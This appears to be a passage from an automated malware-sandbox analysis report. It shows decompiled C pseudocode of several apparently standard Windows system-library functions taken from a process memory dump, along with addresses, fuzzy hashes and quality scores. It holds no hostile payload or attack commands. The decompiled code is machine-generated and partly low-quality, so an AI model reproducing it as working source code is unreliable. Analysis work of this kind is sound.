				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E02B14120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E02B39830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E02B39990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E02B395D0();
							goto L11;
						} else {
							_t109 = L02B14620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E02B3F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E02B395D0();
										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                        0x02b2f0d3
                        0x02b2f0d9
                        0x02b2f0e0
                        0x02b2f0e7
                        0x02b2f0f2
                        0x02b2f0f4
                        0x02b2f0f8
                        0x02b2f100
                        0x02b2f108
                        0x02b2f10d
                        0x02b2f115
                        0x02b2f116
                        0x02b2f11f
                        0x02b2f123
                        0x02b2f124
                        0x02b2f12c
                        0x02b2f130
                        0x02b2f134
                        0x02b2f13d
                        0x02b2f144
                        0x02b2f14b
                        0x02b2f152
                        0x02b6bab0
                        0x02b6bab0
                        0x02b2f158
                        0x02b2f158
                        0x02b2f15a
                        0x02b2f160
                        0x02b2f165
                        0x02b2f166
                        0x02b2f16f
                        0x02b2f173
                        0x02b6baa7
                        0x02b6baa7
                        0x02b6baab
                        0x00000000
                        0x02b2f179
                        0x02b2f18d
                        0x02b2f191
                        0x02b6baa2
                        0x00000000
                        0x02b2f197
                        0x02b2f19b
                        0x02b2f1a2
                        0x02b2f1a9
                        0x02b2f1af
                        0x02b2f1b2
                        0x02b2f1b6
                        0x02b2f1b9
                        0x02b2f1c4
                        0x02b2f1d8
                        0x02b2f1df
                        0x02b2f1e3
                        0x02b2f1eb
                        0x02b2f1ee
                        0x02b2f1f4
                        0x02b2f20f
                        0x02b6bab7
                        0x02b6babb
                        0x02b6bacc
                        0x02b6bad1
                        0x02b2f215
                        0x02b2f218
                        0x02b2f226
                        0x02b2f22b
                        0x00000000
                        0x02b2f22b
                        0x02b2f1f6
                        0x02b2f1f6
                        0x02b2f1f9
                        0x02b2f1fb
                        0x02b2f1fb
                        0x02b2f1f4
                        0x02b2f191
                        0x02b2f173
                        0x02b2f152
                        0x02b2f203

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: 1271186073a3b464f7e79e901787095970908149948b078f15e25794980a5607
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 64516D725047109FC321DF19C840A6BBBF9FF48714F008A6DF9A597690EBB4E954CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B73540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E02B73540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x2bed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E02B30BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E02B73706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E02B3FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E02B73540;
						E02B3FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E02B4DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E02B80C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E02B397C0();
					}
					return E02B3B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E02B73971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E02B73884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E02B3FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E02B39650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E02B73787(_a4,  &_v352, _t80);
						}
					}
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E02B395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                        0x02b73552
                        0x02b7355a
                        0x02b7355d
                        0x02b73566
                        0x02b73567
                        0x02b7357e
                        0x02b7358f
                        0x02b735a1
                        0x02b735a5
                        0x02b7366b
                        0x02b7366b
                        0x02b7366d
                        0x02b73672
                        0x02b73679
                        0x02b73685
                        0x02b7368d
                        0x02b7369d
                        0x02b736a7
                        0x02b736b8
                        0x02b736c6
                        0x02b736c7
                        0x02b736dc
                        0x02b736e1
                        0x02b736e7
                        0x02b736e9
                        0x02b736e9
                        0x02b73703
                        0x02b73703
                        0x02b735b5
                        0x02b735c0
                        0x02b735c4
                        0x00000000
                        0x00000000
                        0x02b735ca
                        0x02b735d7
                        0x02b735e2
                        0x02b735e6
                        0x02b735e8
                        0x02b735f5
                        0x02b735fa
                        0x02b73603
                        0x02b73604
                        0x02b73609
                        0x02b7360a
                        0x02b73612
                        0x02b73613
                        0x02b7361e
                        0x02b73622
                        0x02b73628
                        0x02b7362f
                        0x02b7362f
                        0x02b73636
                        0x02b73638
                        0x02b7363b
                        0x02b73642
                        0x02b73642
                        0x02b73636
                        0x02b73657
                        0x02b73657
                        0x02b7365c
                        0x02b73662
                        0x02b73669
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryHash
                        • API String ID: 2994545307-2202222882
                        • Opcode ID: 8fdaf2665f562b40cfa78b4fac2e1f37f24646d985dc8fc4330f4c4da85e56b7
                        • Instruction ID: 2d6ed863cab27cff6af3ba32025e9a1f17d303123b876107b91ea4ecfb25c3b8
                        • Opcode Fuzzy Hash: 8fdaf2665f562b40cfa78b4fac2e1f37f24646d985dc8fc4330f4c4da85e56b7
                        • Instruction Fuzzy Hash: 944154B2D0052DABDF21DA50DC80FEEB77DAB44718F0045E5EA19AB250DB709E88DF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BC05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E02BC05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E02BC07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E02B39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E02BBA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E02BBA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E02BC1293(_t79, _v40, E02BC07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E02B17D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E02BB138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                        0x02bc05c5
                        0x02bc05ca
                        0x02bc05d3
                        0x02bc06db
                        0x02bc06db
                        0x02bc06dd
                        0x02bc06e3
                        0x02bc06e3
                        0x02bc05dd
                        0x02bc05e7
                        0x02bc05f6
                        0x02bc0600
                        0x02bc0607
                        0x02bc0610
                        0x02bc0615
                        0x02bc061a
                        0x02bc061c
                        0x02bc061e
                        0x02bc0624
                        0x02bc0625
                        0x02bc0627
                        0x02bc0628
                        0x02bc0631
                        0x02bc0640
                        0x02bc064d
                        0x02bc0654
                        0x02bc0654
                        0x02bc0631
                        0x02bc066d
                        0x02bc0674
                        0x00000000
                        0x00000000
                        0x02bc0692
                        0x02bc069e
                        0x02bc06b0
                        0x02bc06a0
                        0x02bc06a9
                        0x02bc06a9
                        0x02bc06b8
                        0x02bc06d6
                        0x02bc06d6
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: 36fb5ab7183513374f73a1c63adbf3427bda456cf96f9144c91fe424a0a341b8
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: C531F332600355ABE720EF64CC85F9777DAEB84758F1446B9FA589B280DB70E904CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B73884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E02B73884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E02B39650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L02B14620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E02B39650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                        0x02b73893
                        0x02b73896
                        0x02b73899
                        0x02b7389f
                        0x02b738a0
                        0x02b738a4
                        0x02b738a9
                        0x02b738ac
                        0x02b738ad
                        0x02b738ae
                        0x02b738af
                        0x02b738b1
                        0x02b738b4
                        0x02b738bb
                        0x02b738bc
                        0x02b738bd
                        0x02b738c4
                        0x02b738c8
                        0x02b738ca
                        0x02b738ca
                        0x02b738d5
                        0x02b7393e
                        0x02b73940
                        0x02b73942
                        0x02b73952
                        0x02b73954
                        0x02b73961
                        0x02b73961
                        0x02b73967
                        0x02b7396e
                        0x02b7396e
                        0x02b73947
                        0x02b7394c
                        0x00000000
                        0x02b7394c
                        0x02b738ea
                        0x02b738ee
                        0x02b738f8
                        0x02b738f9
                        0x02b738ff
                        0x02b73900
                        0x02b73902
                        0x02b73903
                        0x02b7390b
                        0x02b7390f
                        0x02b73950
                        0x00000000
                        0x02b73950
                        0x02b73915
                        0x02b7391d
                        0x02b7391d
                        0x02b73922
                        0x02b73926
                        0x00000000
                        0x02b73928
                        0x02b7392b
                        0x02b7392b
                        0x02b73935
                        0x02b73937
                        0x02b73937
                        0x00000000
                        0x02b73935
                        0x02b73926
                        0x02b738f0
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryName
                        • API String ID: 2994545307-215506332
                        • Opcode ID: a2bab567d0b562ac61abbf9250d228a7aff01cb643f9ec4e1383f38db587486e
                        • Instruction ID: 10f4d75684346247b9a342043d2ce78e23552cd103b9863891c87279f821f115
                        • Opcode Fuzzy Hash: a2bab567d0b562ac61abbf9250d228a7aff01cb643f9ec4e1383f38db587486e
                        • Instruction Fuzzy Hash: D3310572901509AFDB15DA58C945E6BB7B5EB80720F0141E9EE26A7280DB309E00DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E02B2D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2bed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E02B14120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E02B3B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E02B398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E02B395D0();
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                        0x02b2d29c
                        0x02b2d2a6
                        0x02b2d2b1
                        0x02b2d2b5
                        0x02b2d2b6
                        0x02b2d2bc
                        0x02b2d2bd
                        0x02b2d2be
                        0x02b2d2bf
                        0x02b2d2c2
                        0x02b2d2c4
                        0x02b2d2cc
                        0x02b2d384
                        0x02b2d34b
                        0x02b2d34f
                        0x02b2d350
                        0x02b2d351
                        0x02b2d35c
                        0x02b2d35c
                        0x02b2d2d6
                        0x02b2d2da
                        0x02b2d2e1
                        0x02b2d361
                        0x02b2d369
                        0x02b2d36d
                        0x02b2d2e3
                        0x02b2d2e3
                        0x02b2d2e3
                        0x02b2d2e5
                        0x02b2d2ed
                        0x02b2d2f5
                        0x02b2d2fa
                        0x02b2d302
                        0x02b2d303
                        0x02b2d30b
                        0x02b2d30f
                        0x02b2d313
                        0x02b2d318
                        0x02b2d31c
                        0x02b2d320
                        0x02b2d379
                        0x02b2d37d
                        0x00000000
                        0x00000000
                        0x02b6affe
                        0x02b6b001
                        0x02b6b011
                        0x00000000
                        0x02b2d322
                        0x02b2d322
                        0x02b2d330
                        0x02b2d337
                        0x02b2d35d
                        0x02b2d339
                        0x02b2d33f
                        0x02b2d38c
                        0x02b2d38c
                        0x02b2d33f
                        0x02b2d349
                        0x00000000
                        0x02b2d349

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: fc92c78f54405f855a0fc130d1d4c6881c231a11a4605e8f2e60d570fe1e5bb6
                        • Instruction ID: 8b7071a8f92d6cd8f87028beacccb318ddf354ed2ef3059d7675509171b7a54c
                        • Opcode Fuzzy Hash: fc92c78f54405f855a0fc130d1d4c6881c231a11a4605e8f2e60d570fe1e5bb6
                        • Instruction Fuzzy Hash: 9931B3B25083169FC711DF28C980A6BBBE9FB85754F0049AEF998D3210D734DD08CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B01B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E02B01B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E02B3BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E02B3A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E02B3A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L02B14620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                        0x02b01b8f
                        0x02b01b9a
                        0x02b01b9c
                        0x02b01b9e
                        0x02b01ba3
                        0x02b57010
                        0x02b57010
                        0x00000000
                        0x02b01ba9
                        0x02b01ba9
                        0x02b01bae
                        0x00000000
                        0x02b01bc5
                        0x02b01bca
                        0x02b01bcf
                        0x02b01bd0
                        0x02b01bd1
                        0x02b01bd2
                        0x02b01bd6
                        0x02b01bdc
                        0x02b01be0
                        0x02b56ffc
                        0x02b57000
                        0x00000000
                        0x02b57006
                        0x02b57009
                        0x02b57009
                        0x02b01be6
                        0x02b01bec
                        0x02b01c0b
                        0x02b01c0b
                        0x02b01c0c
                        0x02b01c11
                        0x02b01c12
                        0x02b01c15
                        0x02b01c1b
                        0x02b01c1f
                        0x02b01c31
                        0x02b01c33
                        0x02b57026
                        0x02b57026
                        0x02b01c21
                        0x02b01c24
                        0x02b01c24
                        0x02b01bee
                        0x02b01bee
                        0x02b01bf2
                        0x02b01c3a
                        0x02b01bf4
                        0x02b01bf4
                        0x02b01c05
                        0x02b01c05
                        0x02b01c09
                        0x02b01c3e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b01c09
                        0x02b01bec
                        0x02b01be0
                        0x02b01bae
                        0x02b01c2e

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 398e091658e104f5f77a5832d7d280019432dc547d0e3bc62b099cc9b30e9db3
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 46219576611228ABDB379A5D8880F5BBBADEF41754F1A44E5FD089F240DB30DD00EBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B1F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B1F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                        0x02b1f71d
                        0x02b1f722
                        0x02b1f726
                        0x02b64770
                        0x02b1f765
                        0x02b1f769
                        0x02b1f769
                        0x02b1f732
                        0x02b6477a
                        0x00000000
                        0x02b6477a
                        0x02b1f738
                        0x02b1f73a
                        0x02b1f73c
                        0x02b1f73f
                        0x02b1f746
                        0x02b1f778
                        0x02b1f7a9
                        0x02b1f7a9
                        0x02b1f754
                        0x02b1f75a
                        0x02b1f75d
                        0x02b1f75f
                        0x02b1f761
                        0x02b1f76f
                        0x02b1f771
                        0x02b1f771
                        0x02b1f76f
                        0x02b1f763
                        0x00000000
                        0x02b1f763
                        0x02b1f77d
                        0x02b1f7a3
                        0x02b1f7a5
                        0x00000000
                        0x02b1f7a5
                        0x02b1f77f
                        0x02b1f782
                        0x02b1f784
                        0x02b1f786
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b1f788
                        0x02b1f748
                        0x02b1f74d
                        0x02b1f78d
                        0x02b1f793
                        0x02b1f7b7
                        0x02b1f7bc
                        0x00000000
                        0x02b1f7bc
                        0x02b1f798
                        0x00000000
                        0x00000000
                        0x02b1f79d
                        0x02b1f7b0
                        0x00000000
                        0x02b1f7b0
                        0x02b1f79f
                        0x00000000
                        0x02b1f74f
                        0x02b1f74f
                        0x00000000
                        0x02b1f74f

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
